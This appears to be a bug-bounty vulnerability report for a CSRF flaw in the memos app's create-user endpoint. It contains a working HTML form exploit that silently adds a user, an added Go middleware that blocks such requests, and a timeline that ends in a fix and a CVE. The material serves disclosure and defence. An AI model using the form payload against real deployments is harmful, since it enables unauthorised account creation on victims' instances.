Cross-Site Request Forgery (CSRF) in Add Users in usememos/memos

Valid

Reported on

Dec 28th 2022


Description

Hello Team,

The create-member functionality is vulnerable to a CSRF attack. By exploiting the CSRF vulnerability, an attacker can add new members.

<html>

  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.usememos.com/api/user" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;username&quot;&#58;&quot;corry&quot;&#44;&quot;password&quot;&#58;&quot;corry&quot;&#44;&quot;role&quot;&#58;&quot;USER&quot;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

POC video: https://drive.google.com/file/d/1dN2ug8qjwbz1CGbfuBldwam_IFE4BNyH/view?usp=sharing

Fix: I just want to suggest that you set a CSRF token.

Impact

An attacker can add new members in the portal by exploiting the CSRF issue.
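
A server-side check that refuses the form shown above, as an added example (not code from the report or from the memos project, and not the fix in commit c9bb2b). Instead of the CSRF token the report suggests, it uses a different mitigation: requiring a JSON Content-Type and a matching Origin on state-changing requests. The host memos.example, the helper replay and the stand-in handler are assumptions.

```go
package main

import (
	"fmt"
	"mime"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// csrfGuard rejects state-changing requests that a cross-site HTML form can produce.
func csrfGuard(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodGet || r.Method == http.MethodHead || r.Method == http.MethodOptions {
			next.ServeHTTP(w, r) // safe methods must never change state
			return
		}
		// Forms can only send urlencoded, multipart or text/plain bodies, so demand JSON.
		mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
		if err != nil || mt != "application/json" {
			http.Error(w, "unsupported content type", http.StatusUnsupportedMediaType)
			return
		}
		// Browsers attach Origin to cross-site POSTs; when present it must match our Host.
		if o := r.Header.Get("Origin"); o != "" {
			if u, err := url.Parse(o); err != nil || u.Host != r.Host {
				http.Error(w, "cross-origin request refused", http.StatusForbidden)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

// replay sends one constructed POST /api/user through the guard and returns the status code.
func replay(contentType, origin, body string) int {
	created := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
	req := httptest.NewRequest(http.MethodPost, "https://memos.example/api/user", strings.NewReader(body))
	req.Header.Set("Content-Type", contentType)
	req.Header.Set("Origin", origin) // an empty value is treated as absent by the guard
	rec := httptest.NewRecorder()
	csrfGuard(created).ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	body := `{"username":"corry","password":"corry","role":"USER"}` // constructed sample body
	fmt.Println(replay("text/plain", "https://attacker.example", body+"="), replay("application/json", "https://memos.example", body))
}
```

If the application runs behind a reverse proxy that rewrites Host, compare Origin against a configured public origin instead of r.Host.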

We are processing your report and will contact the usememos/memos team within 24 hours. 12 days ago
Anil Bhatt modified the report
12 days ago
Anil Bhatt modified the report
11 days ago
STEVEN validated this vulnerability 11 days ago
Anil Bhatt has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b 11 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 11 days ago